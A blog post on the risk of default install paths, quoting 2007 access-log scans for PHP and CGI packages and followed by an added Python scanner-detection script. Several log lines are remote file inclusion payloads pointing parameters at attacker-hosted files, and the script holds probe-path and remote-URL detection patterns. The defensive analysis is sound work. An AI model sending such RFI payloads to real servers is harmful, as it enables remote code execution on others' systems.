Still thinking default?

Defaults are dangerous.
That is why, as a general rule, I consider installing packages in their default locations a bad idea. Leaving those locations writable is dangerous as well.
Here is why. The following is a single burst from my access log: one scanner working through the default install paths of popular PHP and CGI packages, one request after another:

130.91.197.190 - - [16/Apr/2007:15:02:47 +0100] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /scgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scripts/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /scgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /stats/awstats.pl HTTP/1.0" 404 868

Note the very first request, for a path that cannot exist. That is the scanner calibrating itself: by learning what this server returns for a file that is definitely missing (a plain 404 here), it can tell a real hit from a catch-all page later in the run. Had any of the later files existed, the scanner would have found them. But since none of these packages are installed, or they live somewhere less obvious, the requests did no more harm than burning some CPU, memory and I/O.
The same applies to the next batch, about an hour later, this time hunting for phpMyAdmin:
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /NoService.html HTTP/1.0" 200 2135
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
...
217.172.47.130 - - [21/Apr/2007:12:22:15 +0100] "GET /appserv/main.php?appserv_root=http://217.172.47.130/a.txt?& HTTP/1.1" 302 360

Two things stand out in that second batch. The 302 to NoService.html shows that this server does not always answer a missing path with a 404, which is exactly why scanners calibrate with a must-not-exist request first. And the last line is not a mere existence check: it is a remote file inclusion attempt, with appserv_root pointed at a text file on the attacker's own host, so a main.php that trusted that parameter would fetch and run the attacker's code.
If I had packages installed in their default locations, how safe would I have been? I am not claiming immunity: a targeted attacker crawls the site and finds whatever is linked, and a non-default path does nothing against a hole that is still unpatched. But avoiding defaults does take the site out of reach of these mass scans, which only try the obvious paths. And of course there is a [WORDPRESS] directory. Just not here!

Some stupid thinking again: what does WAMP stand for, Windows/Apache/MySQL/PHP?
81.169.155.140 - - [22/Apr/2007:13:24:29 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
80.237.144.181 - - [22/Apr/2007:13:24:43 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767

Same payload both times, the same remote freeman.txt on a third-party host, fourteen seconds apart from two different addresses. Either they phoned each other, or one operator renewed his IP address in between.
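As an added example, not part of the original post: a small Python script that applies the reasoning behind the three log excerpts above to an access log. It parses Common Log Format lines, tags requests that hit the default install paths seen here (xmlrpc.php, awstats.pl, phpMyAdmin, appserv, wamp_dir) and requests whose query string passes a remote URL (the remote file inclusion probes), and flags a client as a scanner when it fires several such probes within a short window or sends any RFI payload at all. It deliberately does not key on the 404 status, because, as the phpMyAdmin batch shows, this server answered those with a 302. The sample lines are the post's own excerpts plus one constructed benign request from a documentation address; the path list, the threshold and the window are my assumptions, not the author's.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

# Sample input: lines from the post's excerpts, plus one constructed benign
# request from 198.51.100.7 (a documentation address) as a control.
SAMPLE_LOG = """\
130.91.197.190 - - [16/Apr/2007:15:02:47 +0100] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /NoService.html HTTP/1.0" 200 2135
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
217.172.47.130 - - [21/Apr/2007:12:22:15 +0100] "GET /appserv/main.php?appserv_root=http://217.172.47.130/a.txt?& HTTP/1.1" 302 360
81.169.155.140 - - [22/Apr/2007:13:24:29 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
198.51.100.7 - - [22/Apr/2007:13:30:00 +0100] "GET /index.html HTTP/1.1" 200 5120
"""

# Apache Common Log Format: ip ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Default install paths probed in the post's excerpts (assumed list; extend
# it with whatever your own logs show).
DEFAULT_PATH_PROBES = [re.compile(p, re.IGNORECASE) for p in (
    r'/xmlrpc\.php$',
    r'/awstats\.pl$',
    r'^/(phpmyadmin|pma|mysql)/',
    r'^/appserv/',
    r'/wamp_dir/',
)]

# A query parameter whose value is a remote URL is the signature of a
# remote file inclusion probe (appserv_root=http://..., no_url=http://...).
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Return a dict for one log line, or None if it is not in CLF."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    req = m.groupdict()
    req["time"] = datetime.strptime(req["ts"], "%d/%b/%Y:%H:%M:%S %z")
    req["status"] = int(req["status"])
    parts = urlsplit(req["target"])
    req["path"] = parts.path
    req["query"] = parse_qsl(parts.query, keep_blank_values=True)
    return req


def classify(req):
    """Tag a request 'default-path' and/or 'rfi'; empty list if benign."""
    tags = []
    if any(p.search(req["path"]) for p in DEFAULT_PATH_PROBES):
        tags.append("default-path")
    if any(v.strip().lower().startswith(REMOTE_SCHEMES) for _, v in req["query"]):
        tags.append("rfi")
    return tags


def summarize(log_text, window=timedelta(seconds=60), threshold=3):
    """Per-client summary. 'scanner' is True for any RFI payload, or for
    `threshold` or more probe requests inside `window` (status ignored)."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        req = parse_line(line)
        if req:
            per_ip[req["ip"]].append(req)

    report = {}
    for ip, reqs in per_ip.items():
        reqs.sort(key=lambda r: r["time"])
        tagged = [classify(r) for r in reqs]
        probes = sum(1 for t in tagged if t)
        rfi = sum(1 for t in tagged if "rfi" in t)
        span = reqs[-1]["time"] - reqs[0]["time"]
        report[ip] = {
            "requests": len(reqs),
            "probes": probes,
            "rfi": rfi,
            "status_404": sum(1 for r in reqs if r["status"] == 404),
            "span_s": span.total_seconds(),
            "scanner": rfi > 0 or (probes >= threshold and span <= window),
        }
    return report


if __name__ == "__main__":
    for ip, row in summarize(SAMPLE_LOG).items():
        flag = "SCANNER" if row["scanner"] else "ok"
        print(f"{ip:16} {row['requests']:3} req {row['probes']:3} probes "
              f"{row['rfi']:2} rfi {row['status_404']:3}x404 {flag}")
```

Run it on a real log with `summarize(open("access.log").read())`. The phpMyAdmin client is flagged with zero 404s, which is the point: path-based matching survives a catch-all redirect, a pure "many 404s from one IP" rule would not.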
